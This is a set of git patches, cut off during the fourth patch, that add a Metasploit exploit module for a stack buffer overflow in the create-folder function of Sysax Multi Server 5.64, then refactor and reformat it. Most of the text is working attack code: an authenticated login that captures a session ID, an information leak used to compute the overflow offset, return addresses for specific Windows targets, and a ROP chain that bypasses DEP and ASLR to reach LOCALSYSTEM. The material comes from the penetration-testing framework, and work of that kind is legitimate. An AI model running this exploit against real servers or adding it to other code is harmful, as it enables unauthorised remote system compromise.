From 2f7b5f35afeac081860ceb70f7a7c9d390c0dfc0 Mon Sep 17 00:00:00 2001 From: Matt Andreko Date: Sun, 29 Jul 2012 10:40:02 -0400 Subject: [PATCH 1/5] Added Sysax 5.64 Create Folder exploit --- .../windows/http/sysax_create_folder.rb | 183 ++++++++++++++++++ 1 file changed, 183 insertions(+) create mode 100644 modules/exploits/windows/http/sysax_create_folder.rb diff --git a/modules/exploits/windows/http/sysax_create_folder.rb b/modules/exploits/windows/http/sysax_create_folder.rb new file mode 100644 index 0000000000..fe900d7d34 --- /dev/null +++ b/modules/exploits/windows/http/sysax_create_folder.rb @@ -0,0 +1,183 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'base64' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Sysax Multi Server 5.64 Create Folder BoF', + 'Description' => %q{ + This module exploits a stack buffer overflow in the create folder function + in Sysax Multi Server 5.64. This issue was fixed in 5.66. + + You must have valid credentials to trigger the vulnerability. Your credentials + must also have the create folder permission and the HTTP option has to be enabled. + This module will log into the server, get your a SID token and then proceed to exploit + the server. Successful exploits result in LOCALSYSTEM access. This exploit works on + XP SP3, and Server 2003 SP1-SP2. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Matt Andreko @mandreko', # discovery & Metasploit module for 5.64 + 'Craig Freyman @cd1zz', # original discovery & Metasploit module for 5.50 + ], + 'Version' => '$Revision:$', + 'References' => + [ + [ 'URL', 'http://www.mattandreko.com/2012/07/sysax-564-http-remote-buffer-overflow.html' ], # 5.64 update + [ 'URL', 'http://www.pwnag3.com/2012/01/sysax-multi-server-550-exploit.html' ], # 5.50 post + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Platform' => 'win', + 'Payload' => + { + 'BadChars' => "\x00\x2F", + }, + + 'Targets' => + [ + [ 'Windows XP SP3', + { + 'Rop' => false, + 'Ret' => 0x77c35459, # push esp # ret [sysaxd.exe] + 'Offset' => 701, + } + ], + [ 'Windows 2003 SP1-SP2 DEP & ASLR Bypass', + { + 'Rop' => true, + 'Ret' => 0x77baf605, # pivot + 'Offset' => 701, + 'Nop' => 0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll] + } + ], + ], + 'Privileged' => false, + 'DisclosureDate'=> 'July 29, 2012', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('URI', [false, "URI for Multi Server", '/']), + Opt::RPORT(80), + OptString.new('SysaxUSER', [ true, "Username" ]), + OptString.new('SysaxPASS', [ true, "Password" ]) + ], self.class) + + end + + def target_url + "http://#{rhost}:#{rport}#{datastore['URI']}" + end + + def create_rop_chain() + rop_gadgets = [] + # All rop gadgets generated by mona.py + # Thanks corelanc0d3r for making such a great tool + + if (target == targets[1]) # Windows 2003 + rop_gadgets = + [ + 0x77be3adb, # POP EAX # RETN [msvcrt.dll] + 0x77ba1114, # ptr to &VirtualProtect() [IAT msvcrt.dll] + 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN [msvcrt.dll] + 0x41414141, # Filler (compensate) + 0x77bb0c86, # XCHG EAX,ESI # RETN [msvcrt.dll] + 0x77bdb896, # POP EBP # RETN [msvcrt.dll] + 0x77be2265, # & push esp # ret [msvcrt.dll] + 0x77bdeebf, # POP EAX # RETN [msvcrt.dll] + 0x2cfe0668, # put delta into eax (-> put 0x00000201 into ebx) + 0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] + 0x77bdfe37, # ADD EBX,EAX # OR EAX,3000000 # RETN [msvcrt.dll] + 0x77bdf0da, # POP EAX # RETN [msvcrt.dll] + 0x2cfe04a7, # put delta into eax (-> put 0x00000040 into edx) + 0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] + 0x77bb8285, # XCHG EAX,EDX # RETN [msvcrt.dll] + 0x77bcc2ee, # POP ECX # RETN [msvcrt.dll] + 0x77befbb4, # &Writable location [msvcrt.dll] + 0x77bbf75e, # POP EDI # RETN [msvcrt.dll] + 0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll] + 0x77bdf0da, # POP EAX # RETN [msvcrt.dll] + 0x90909090, # nop + 0x77be6591, # PUSHAD # ADD AL,0EF # RETN [msvcrt.dll] + ].flatten.pack("V*") + end + + return rop_gadgets + + end + + def exploit + + user = datastore['SysaxUSER'] + pass = datastore['SysaxPASS'] + + #base64 encode the credentials + encodedcreds = Base64.encode64(user+"\x0a"+pass) + creds = "fd="+encodedcreds + + connect + + # Login to get SID value + print_status "Getting SID from #{target_url}" + res = send_request_raw({ + 'method'=> 'POST', + 'uri' => "#{target_url}/scgi?sid=0&pid=dologin", + 'data' => creds + },20) + + #parse response for SID token + sid = res.body.match (/(sid=[A-Z0-9a-z]{40})/) + print_status "Your " + sid.to_s + + buffer = rand_text(target['Offset']) + buffer << [target.ret].pack('V') + + if (target['Rop']) + buffer << [target['Nop']].pack('V')*16 + buffer << create_rop_chain() + end + + buffer << make_nops(15) + buffer << payload.encoded #max 1299 bytes + + #pwnag3 post data + post_data = "scgi?"+sid.to_s+"&pid=mk_folder2_name1.htm HTTP/1.1\r\n" + post_data << "Content-Length: 171\r\n\r\n" + post_data << "-----------------------------1190753071675116720811342231\r\n" + post_data << "Content-Disposition: form-data; name=\"e2\"\r\n\r\n" + post_data << buffer+"\r\n" + post_data << "-----------------------------1190753071675116720811342231--\r\n\r\n" + + referer = "http://"+datastore['RHOST'].to_s+"/scgi?"+sid.to_s+"&pid=mk_folder1_name1.htm" + + send_request_raw({ + 'uri' => "/" + post_data, + 'version' => '1.1', + 'method' => 'POST', + 'referer' => referer + }) + + handler + disconnect + + end +end \ No newline at end of file From bd249d1f28988905a99d8757decc6d2deb18fbc7 Mon Sep 17 00:00:00 2001 From: Matt Andreko Date: Sun, 19 Aug 2012 10:01:03 -0400 Subject: [PATCH 2/5] Fixed exploit and made code review changes The exploit was not working due to the user's root path causing the EIP offset to change. To correct this, I was able to get the server to disclose the root path in an error message (fixed in 5.67). I also radically refactored the exploit due to the feedback I received from Juan Vazquez. --- .../windows/http/sysax_create_folder.rb | 313 +++++++++--------- 1 file changed, 162 insertions(+), 151 deletions(-) diff --git a/modules/exploits/windows/http/sysax_create_folder.rb b/modules/exploits/windows/http/sysax_create_folder.rb index fe900d7d34..902b344787 100644 --- a/modules/exploits/windows/http/sysax_create_folder.rb +++ b/modules/exploits/windows/http/sysax_create_folder.rb @@ -10,174 +10,185 @@ ## require 'msf/core' -require 'base64' class Metasploit3 < Msf::Exploit::Remote - Rank = NormalRanking + Rank = NormalRanking - include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpClient - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Sysax Multi Server 5.64 Create Folder BoF', - 'Description' => %q{ - This module exploits a stack buffer overflow in the create folder function - in Sysax Multi Server 5.64. This issue was fixed in 5.66. + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Sysax Multi Server 5.64 Create Folder Buffer Overflow', + 'Description' => %q{ + This module exploits a stack buffer overflow in the create folder function + in Sysax Multi Server 5.64. This issue was fixed in 5.66. + + You must have valid credentials to trigger the vulnerability. Your credentials + must also have the create folder permission and the HTTP option has to be enabled. + This module will log into the server, get your a SID token, find the root folder, + and then proceed to exploit the server. Successful exploits result in LOCALSYSTEM + access. This exploit works on XP SP3, and Server 2003 SP1-SP2. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Matt "hostess" Andreko', + ], + 'References' => + [ + [ 'URL', 'http://www.mattandreko.com/2012/07/sysax-564-http-remote-buffer-overflow.html' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Platform' => 'win', + 'Payload' => + { + 'BadChars' => "\x00\x2F\x0d\x0a", # 0d and 0a are only bad, due to the Rex::MIME replacing 0d with 0d0a in the message#to_s + }, + + 'Targets' => + [ + [ 'Windows XP SP3', + { + 'Rop' => false, + 'Ret' => 0x77c35459, # push esp # ret [sysaxd.exe] + 'Offset' => 711, + } + ], + [ 'Windows 2003 SP1-SP2 DEP & ASLR Bypass', + { + 'Rop' => true, + 'Ret' => 0x77baf605, # pivot + 'Offset' => 711, + 'Nop' => 0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll] + } + ], + ], + 'Privileged' => false, + 'DisclosureDate'=> 'July 29, 2012', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The URI path to the Sysax web application', '/']), + Opt::RPORT(80), + OptString.new('SysaxUSER', [ true, "Username" ]), + OptString.new('SysaxPASS', [ true, "Password" ]) + ], self.class) - You must have valid credentials to trigger the vulnerability. Your credentials - must also have the create folder permission and the HTTP option has to be enabled. - This module will log into the server, get your a SID token and then proceed to exploit - the server. Successful exploits result in LOCALSYSTEM access. This exploit works on - XP SP3, and Server 2003 SP1-SP2. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'Matt Andreko @mandreko', # discovery & Metasploit module for 5.64 - 'Craig Freyman @cd1zz', # original discovery & Metasploit module for 5.50 - ], - 'Version' => '$Revision:$', - 'References' => - [ - [ 'URL', 'http://www.mattandreko.com/2012/07/sysax-564-http-remote-buffer-overflow.html' ], # 5.64 update - [ 'URL', 'http://www.pwnag3.com/2012/01/sysax-multi-server-550-exploit.html' ], # 5.50 post - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - }, - 'Platform' => 'win', - 'Payload' => - { - 'BadChars' => "\x00\x2F", - }, + end + + def create_rop_chain() + rop_gadgets = [] - 'Targets' => - [ - [ 'Windows XP SP3', - { - 'Rop' => false, - 'Ret' => 0x77c35459, # push esp # ret [sysaxd.exe] - 'Offset' => 701, - } - ], - [ 'Windows 2003 SP1-SP2 DEP & ASLR Bypass', - { - 'Rop' => true, - 'Ret' => 0x77baf605, # pivot - 'Offset' => 701, - 'Nop' => 0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll] - } - ], - ], - 'Privileged' => false, - 'DisclosureDate'=> 'July 29, 2012', - 'DefaultTarget' => 0)) + # ROP chains provided by Corelan.be + # https://www.corelan.be/index.php/security/corelan-ropdb/#msvcrtdll_8211_v7037903959_Windows_2003_SP1_SP2 + if (target == targets[1]) # Windows 2003 + rop_gadgets = + [ + 0x77be3adb, # POP EAX # RETN [msvcrt.dll] + 0x77ba1114, # ptr to &VirtualProtect() [IAT msvcrt.dll] + 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN [msvcrt.dll] + 0x41414141, # Filler (compensate) + 0x77bb0c86, # XCHG EAX,ESI # RETN [msvcrt.dll] + 0x77bdb896, # POP EBP # RETN [msvcrt.dll] + 0x77be2265, # & push esp # ret [msvcrt.dll] + 0x77bdeebf, # POP EAX # RETN [msvcrt.dll] + 0x2cfe0668, # put delta into eax (-> put 0x00000201 into ebx) + 0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] + 0x77bdfe37, # ADD EBX,EAX # OR EAX,3000000 # RETN [msvcrt.dll] + 0x77bdf0da, # POP EAX # RETN [msvcrt.dll] + 0x2cfe04a7, # put delta into eax (-> put 0x00000040 into edx) + 0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] + 0x77bb8285, # XCHG EAX,EDX # RETN [msvcrt.dll] + 0x77bcc2ee, # POP ECX # RETN [msvcrt.dll] + 0x77befbb4, # &Writable location [msvcrt.dll] + 0x77bbf75e, # POP EDI # RETN [msvcrt.dll] + 0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll] + 0x77bdf0da, # POP EAX # RETN [msvcrt.dll] + 0x90909090, # nop + 0x77be6591, # PUSHAD # ADD AL,0EF # RETN [msvcrt.dll] + ].flatten.pack("V*") + end - register_options( - [ - OptString.new('URI', [false, "URI for Multi Server", '/']), - Opt::RPORT(80), - OptString.new('SysaxUSER', [ true, "Username" ]), - OptString.new('SysaxPASS', [ true, "Password" ]) - ], self.class) - - end + return rop_gadgets - def target_url - "http://#{rhost}:#{rport}#{datastore['URI']}" - end + end - def create_rop_chain() - rop_gadgets = [] - # All rop gadgets generated by mona.py - # Thanks corelanc0d3r for making such a great tool + def get_sid - if (target == targets[1]) # Windows 2003 - rop_gadgets = - [ - 0x77be3adb, # POP EAX # RETN [msvcrt.dll] - 0x77ba1114, # ptr to &VirtualProtect() [IAT msvcrt.dll] - 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN [msvcrt.dll] - 0x41414141, # Filler (compensate) - 0x77bb0c86, # XCHG EAX,ESI # RETN [msvcrt.dll] - 0x77bdb896, # POP EBP # RETN [msvcrt.dll] - 0x77be2265, # & push esp # ret [msvcrt.dll] - 0x77bdeebf, # POP EAX # RETN [msvcrt.dll] - 0x2cfe0668, # put delta into eax (-> put 0x00000201 into ebx) - 0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] - 0x77bdfe37, # ADD EBX,EAX # OR EAX,3000000 # RETN [msvcrt.dll] - 0x77bdf0da, # POP EAX # RETN [msvcrt.dll] - 0x2cfe04a7, # put delta into eax (-> put 0x00000040 into edx) - 0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] - 0x77bb8285, # XCHG EAX,EDX # RETN [msvcrt.dll] - 0x77bcc2ee, # POP ECX # RETN [msvcrt.dll] - 0x77befbb4, # &Writable location [msvcrt.dll] - 0x77bbf75e, # POP EDI # RETN [msvcrt.dll] - 0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll] - 0x77bdf0da, # POP EAX # RETN [msvcrt.dll] - 0x90909090, # nop - 0x77be6591, # PUSHAD # ADD AL,0EF # RETN [msvcrt.dll] - ].flatten.pack("V*") - end + user = datastore['SysaxUSER'] + pass = datastore['SysaxPASS'] - return rop_gadgets + creds = "fd=#{Rex::Text.encode_base64(user+"\x0a"+pass)}" - end + # Login to get SID value + r = send_request_cgi({ + 'method' => "POST", + 'uri' => "#{target_uri.to_s}scgi?sid=0&pid=dologin", + 'data' => creds + }) - def exploit - - user = datastore['SysaxUSER'] - pass = datastore['SysaxPASS'] - - #base64 encode the credentials - encodedcreds = Base64.encode64(user+"\x0a"+pass) - creds = "fd="+encodedcreds + # Parse response for SID token + sid = r.body.match(/sid=([A-Z0-9a-z]{40})/)[1] + print_status "SID: #{sid.to_s}" - connect + sid.to_s + + end - # Login to get SID value - print_status "Getting SID from #{target_url}" - res = send_request_raw({ - 'method'=> 'POST', - 'uri' => "#{target_url}/scgi?sid=0&pid=dologin", - 'data' => creds - },20) - - #parse response for SID token - sid = res.body.match (/(sid=[A-Z0-9a-z]{40})/) - print_status "Your " + sid.to_s + def get_root_path(sid) - buffer = rand_text(target['Offset']) - buffer << [target.ret].pack('V') + # Find the path because it's used to help calculate the offset + random_folder_name = rand_text_alpha(8) # This folder should not exist in the root dir - if (target['Rop']) - buffer << [target['Nop']].pack('V')*16 - buffer << create_rop_chain() - end + r = send_request_cgi({ + 'uri' => "#{target_uri.to_s}scgi?sid=#{sid}&pid=transferpage2_name1_#{random_folder_name}.htm", + 'method' => 'POST', + }) - buffer << make_nops(15) - buffer << payload.encoded #max 1299 bytes - - #pwnag3 post data - post_data = "scgi?"+sid.to_s+"&pid=mk_folder2_name1.htm HTTP/1.1\r\n" - post_data << "Content-Length: 171\r\n\r\n" - post_data << "-----------------------------1190753071675116720811342231\r\n" - post_data << "Content-Disposition: form-data; name=\"e2\"\r\n\r\n" - post_data << buffer+"\r\n" - post_data << "-----------------------------1190753071675116720811342231--\r\n\r\n" - - referer = "http://"+datastore['RHOST'].to_s+"/scgi?"+sid.to_s+"&pid=mk_folder1_name1.htm" - - send_request_raw({ - 'uri' => "/" + post_data, - 'version' => '1.1', - 'method' => 'POST', - 'referer' => referer - }) + # Example message: invalid path: C:\Documents and Settings\Administrator\Desktop\9dk2hdh2. + # Root Path should be C:\Documents and Settings\Administrator\Desktop (no trailing slash) + root_path = r.body.match(/^invalid path: (.*)\\#{random_folder_name}\.$/)[1] + print_status "Root Dir: #{root_path}" - handler - disconnect + root_path + + end + + def exploit + + connect + + sid = get_sid + root_path = get_root_path(sid) + + buffer = rand_text(target['Offset']-root_path.length) + buffer << [target.ret].pack('V') + + if (target['Rop']) + buffer << [target['Nop']].pack('V')*16 + buffer << create_rop_chain() + end + + buffer << make_nops(15) + buffer << payload.encoded #max 1299 bytes + + post_data = Rex::MIME::Message.new + post_data.add_part(buffer, nil, nil, "form-data; name=\"e2\"") + post_data.bound = rand_text_numeric(57) # example; "---------------------------12816808881949705206242427669" + + r = send_request_cgi({ + 'uri' => "#{target_uri.to_s}scgi?sid=#{sid}&pid=mk_folder2_name1.htm", + 'method' => 'POST', + 'data' => post_data.to_s, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", + }) + + disconnect + + end +end - end -end \ No newline at end of file From d82493a658a1904a66677a7539e99207cb5ad00a Mon Sep 17 00:00:00 2001 From: Matt Andreko Date: Sun, 19 Aug 2012 22:09:08 -0400 Subject: [PATCH 3/5] Code Review Feedback Added 'Space' payload option, which in turn also required 'DisableNops' Added/Corrected documentation for return addresses --- modules/exploits/windows/http/sysax_create_folder.rb | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/modules/exploits/windows/http/sysax_create_folder.rb b/modules/exploits/windows/http/sysax_create_folder.rb index 902b344787..5883e1a5d8 100644 --- a/modules/exploits/windows/http/sysax_create_folder.rb +++ b/modules/exploits/windows/http/sysax_create_folder.rb @@ -45,7 +45,9 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Payload' => { - 'BadChars' => "\x00\x2F\x0d\x0a", # 0d and 0a are only bad, due to the Rex::MIME replacing 0d with 0d0a in the message#to_s + 'BadChars' => "\x00\x2F\x0d\x0a", # 0d and 0a are only bad, due to the Rex::MIME replacing 0d with 0d0a in the message#to_s + 'Space' => '1299', + 'DisableNops' => true, }, 'Targets' => @@ -53,14 +55,14 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Windows XP SP3', { 'Rop' => false, - 'Ret' => 0x77c35459, # push esp # ret [sysaxd.exe] + 'Ret' => 0x77c35459, # push esp # ret [msvcrt.dll] 'Offset' => 711, } ], [ 'Windows 2003 SP1-SP2 DEP & ASLR Bypass', { 'Rop' => true, - 'Ret' => 0x77baf605, # pivot + 'Ret' => 0x77baf605, # pop esi; pop ebp; retn 0c; [msvcrt.dll] (pivot) 'Offset' => 711, 'Nop' => 0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll] } @@ -147,7 +149,7 @@ class Metasploit3 < Msf::Exploit::Remote r = send_request_cgi({ 'uri' => "#{target_uri.to_s}scgi?sid=#{sid}&pid=transferpage2_name1_#{random_folder_name}.htm", 'method' => 'POST', - }) + }) # Example message: invalid path: C:\Documents and Settings\Administrator\Desktop\9dk2hdh2. # Root Path should be C:\Documents and Settings\Administrator\Desktop (no trailing slash) @@ -174,7 +176,7 @@ class Metasploit3 < Msf::Exploit::Remote end buffer << make_nops(15) - buffer << payload.encoded #max 1299 bytes + buffer << payload.encoded post_data = Rex::MIME::Message.new post_data.add_part(buffer, nil, nil, "form-data; name=\"e2\"") From d226135986250bb8e7eab6612f7912e8bd3ec9d3 Mon Sep 17 00:00:00 2001 From: Matt Andreko Date: Mon, 20 Aug 2012 10:41:42 -0400 Subject: [PATCH 4/5] Code Review Feedback Removed trailing spaces and fixed indenting. --- .../windows/http/sysax_create_folder.rb | 307 +++++++++--------- 1 file changed, 153 insertions(+), 154 deletions(-) diff --git a/modules/exploits/windows/http/sysax_create_folder.rb b/modules/exploits/windows/http/sysax_create_folder.rb index 5883e1a5d8..a07189e478 100644 --- a/modules/exploits/windows/http/sysax_create_folder.rb +++ b/modules/exploits/windows/http/sysax_create_folder.rb @@ -6,191 +6,190 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. -# http://metasploit.com/ +# http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = NormalRanking + Rank = NormalRanking - include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpClient - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Sysax Multi Server 5.64 Create Folder Buffer Overflow', - 'Description' => %q{ - This module exploits a stack buffer overflow in the create folder function - in Sysax Multi Server 5.64. This issue was fixed in 5.66. - - You must have valid credentials to trigger the vulnerability. Your credentials - must also have the create folder permission and the HTTP option has to be enabled. - This module will log into the server, get your a SID token, find the root folder, - and then proceed to exploit the server. Successful exploits result in LOCALSYSTEM - access. This exploit works on XP SP3, and Server 2003 SP1-SP2. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'Matt "hostess" Andreko', - ], - 'References' => - [ - [ 'URL', 'http://www.mattandreko.com/2012/07/sysax-564-http-remote-buffer-overflow.html' ], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - }, - 'Platform' => 'win', - 'Payload' => - { - 'BadChars' => "\x00\x2F\x0d\x0a", # 0d and 0a are only bad, due to the Rex::MIME replacing 0d with 0d0a in the message#to_s - 'Space' => '1299', - 'DisableNops' => true, - }, - - 'Targets' => - [ - [ 'Windows XP SP3', - { - 'Rop' => false, - 'Ret' => 0x77c35459, # push esp # ret [msvcrt.dll] - 'Offset' => 711, - } - ], - [ 'Windows 2003 SP1-SP2 DEP & ASLR Bypass', - { - 'Rop' => true, - 'Ret' => 0x77baf605, # pop esi; pop ebp; retn 0c; [msvcrt.dll] (pivot) - 'Offset' => 711, - 'Nop' => 0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll] - } - ], - ], - 'Privileged' => false, - 'DisclosureDate'=> 'July 29, 2012', - 'DefaultTarget' => 0)) - - register_options( - [ - OptString.new('TARGETURI', [true, 'The URI path to the Sysax web application', '/']), - Opt::RPORT(80), - OptString.new('SysaxUSER', [ true, "Username" ]), - OptString.new('SysaxPASS', [ true, "Password" ]) - ], self.class) + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Sysax Multi Server 5.64 Create Folder Buffer Overflow', + 'Description' => %q{ + This module exploits a stack buffer overflow in the create folder function + in Sysax Multi Server 5.64. This issue was fixed in 5.66. - end - - def create_rop_chain() - rop_gadgets = [] + You must have valid credentials to trigger the vulnerability. Your credentials + must also have the create folder permission and the HTTP option has to be enabled. + This module will log into the server, get your a SID token, find the root folder, + and then proceed to exploit the server. Successful exploits result in LOCALSYSTEM + access. This exploit works on XP SP3, and Server 2003 SP1-SP2. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Matt "hostess" Andreko', + ], + 'References' => + [ + [ 'URL', 'http://www.mattandreko.com/2012/07/sysax-564-http-remote-buffer-overflow.html' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Platform' => 'win', + 'Payload' => + { + 'BadChars' => "\x00\x2F\x0d\x0a", # 0d and 0a are only bad, due to the Rex::MIME replacing 0d with 0d0a in the message#to_s + 'Space' => '1299', + 'DisableNops' => true, + }, - # ROP chains provided by Corelan.be - # https://www.corelan.be/index.php/security/corelan-ropdb/#msvcrtdll_8211_v7037903959_Windows_2003_SP1_SP2 - if (target == targets[1]) # Windows 2003 - rop_gadgets = - [ - 0x77be3adb, # POP EAX # RETN [msvcrt.dll] - 0x77ba1114, # ptr to &VirtualProtect() [IAT msvcrt.dll] - 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN [msvcrt.dll] - 0x41414141, # Filler (compensate) - 0x77bb0c86, # XCHG EAX,ESI # RETN [msvcrt.dll] - 0x77bdb896, # POP EBP # RETN [msvcrt.dll] - 0x77be2265, # & push esp # ret [msvcrt.dll] - 0x77bdeebf, # POP EAX # RETN [msvcrt.dll] - 0x2cfe0668, # put delta into eax (-> put 0x00000201 into ebx) - 0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] - 0x77bdfe37, # ADD EBX,EAX # OR EAX,3000000 # RETN [msvcrt.dll] - 0x77bdf0da, # POP EAX # RETN [msvcrt.dll] - 0x2cfe04a7, # put delta into eax (-> put 0x00000040 into edx) - 0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] - 0x77bb8285, # XCHG EAX,EDX # RETN [msvcrt.dll] - 0x77bcc2ee, # POP ECX # RETN [msvcrt.dll] - 0x77befbb4, # &Writable location [msvcrt.dll] - 0x77bbf75e, # POP EDI # RETN [msvcrt.dll] - 0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll] - 0x77bdf0da, # POP EAX # RETN [msvcrt.dll] - 0x90909090, # nop - 0x77be6591, # PUSHAD # ADD AL,0EF # RETN [msvcrt.dll] - ].flatten.pack("V*") - end + 'Targets' => + [ + [ 'Windows XP SP3', + { + 'Rop' => false, + 'Ret' => 0x77c35459, # push esp # ret [msvcrt.dll] + 'Offset' => 711, + } + ], + [ 'Windows 2003 SP1-SP2 DEP & ASLR Bypass', + { + 'Rop' => true, + 'Ret' => 0x77baf605, # pop esi; pop ebp; retn 0c; [msvcrt.dll] (pivot) + 'Offset' => 711, + 'Nop' => 0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll] + } + ], + ], + 'Privileged' => false, + 'DisclosureDate'=> 'July 29, 2012', + 'DefaultTarget' => 0)) - return rop_gadgets + register_options( + [ + OptString.new('TARGETURI', [true, 'The URI path to the Sysax web application', '/']), + Opt::RPORT(80), + OptString.new('SysaxUSER', [ true, "Username" ]), + OptString.new('SysaxPASS', [ true, "Password" ]) + ], self.class) - end + end - def get_sid + def create_rop_chain() + rop_gadgets = [] - user = datastore['SysaxUSER'] - pass = datastore['SysaxPASS'] + # ROP chains provided by Corelan.be + # https://www.corelan.be/index.php/security/corelan-ropdb/#msvcrtdll_8211_v7037903959_Windows_2003_SP1_SP2 + if (target == targets[1]) # Windows 2003 + rop_gadgets = + [ + 0x77be3adb, # POP EAX # RETN [msvcrt.dll] + 0x77ba1114, # ptr to &VirtualProtect() [IAT msvcrt.dll] + 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN [msvcrt.dll] + 0x41414141, # Filler (compensate) + 0x77bb0c86, # XCHG EAX,ESI # RETN [msvcrt.dll] + 0x77bdb896, # POP EBP # RETN [msvcrt.dll] + 0x77be2265, # & push esp # ret [msvcrt.dll] + 0x77bdeebf, # POP EAX # RETN [msvcrt.dll] + 0x2cfe0668, # put delta into eax (-> put 0x00000201 into ebx) + 0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] + 0x77bdfe37, # ADD EBX,EAX # OR EAX,3000000 # RETN [msvcrt.dll] + 0x77bdf0da, # POP EAX # RETN [msvcrt.dll] + 0x2cfe04a7, # put delta into eax (-> put 0x00000040 into edx) + 0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] + 0x77bb8285, # XCHG EAX,EDX # RETN [msvcrt.dll] + 0x77bcc2ee, # POP ECX # RETN [msvcrt.dll] + 0x77befbb4, # &Writable location [msvcrt.dll] + 0x77bbf75e, # POP EDI # RETN [msvcrt.dll] + 0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll] + 0x77bdf0da, # POP EAX # RETN [msvcrt.dll] + 0x90909090, # nop + 0x77be6591, # PUSHAD # ADD AL,0EF # RETN [msvcrt.dll] + ].flatten.pack("V*") + end - creds = "fd=#{Rex::Text.encode_base64(user+"\x0a"+pass)}" + return rop_gadgets - # Login to get SID value - r = send_request_cgi({ - 'method' => "POST", - 'uri' => "#{target_uri.to_s}scgi?sid=0&pid=dologin", - 'data' => creds - }) + end - # Parse response for SID token - sid = r.body.match(/sid=([A-Z0-9a-z]{40})/)[1] - print_status "SID: #{sid.to_s}" + def get_sid - sid.to_s - - end + user = datastore['SysaxUSER'] + pass = datastore['SysaxPASS'] - def get_root_path(sid) + creds = "fd=#{Rex::Text.encode_base64(user+"\x0a"+pass)}" - # Find the path because it's used to help calculate the offset - random_folder_name = rand_text_alpha(8) # This folder should not exist in the root dir + # Login to get SID value + r = send_request_cgi({ + 'method' => "POST", + 'uri' => "#{target_uri.to_s}scgi?sid=0&pid=dologin", + 'data' => creds + }) - r = send_request_cgi({ - 'uri' => "#{target_uri.to_s}scgi?sid=#{sid}&pid=transferpage2_name1_#{random_folder_name}.htm", - 'method' => 'POST', - }) + # Parse response for SID token + sid = r.body.match(/sid=([A-Z0-9a-z]{40})/)[1] + print_status "SID: #{sid.to_s}" - # Example message: invalid path: C:\Documents and Settings\Administrator\Desktop\9dk2hdh2. - # Root Path should be C:\Documents and Settings\Administrator\Desktop (no trailing slash) - root_path = r.body.match(/^invalid path: (.*)\\#{random_folder_name}\.$/)[1] - print_status "Root Dir: #{root_path}" + sid.to_s - root_path + end - end + def get_root_path(sid) - def exploit + # Find the path because it's used to help calculate the offset + random_folder_name = rand_text_alpha(8) # This folder should not exist in the root dir - connect + r = send_request_cgi({ + 'uri' => "#{target_uri.to_s}scgi?sid=#{sid}&pid=transferpage2_name1_#{random_folder_name}.htm", + 'method' => 'POST', + }) - sid = get_sid - root_path = get_root_path(sid) + # Example message: invalid path: C:\Documents and Settings\Administrator\Desktop\9dk2hdh2. + # Root Path should be C:\Documents and Settings\Administrator\Desktop (no trailing slash) + 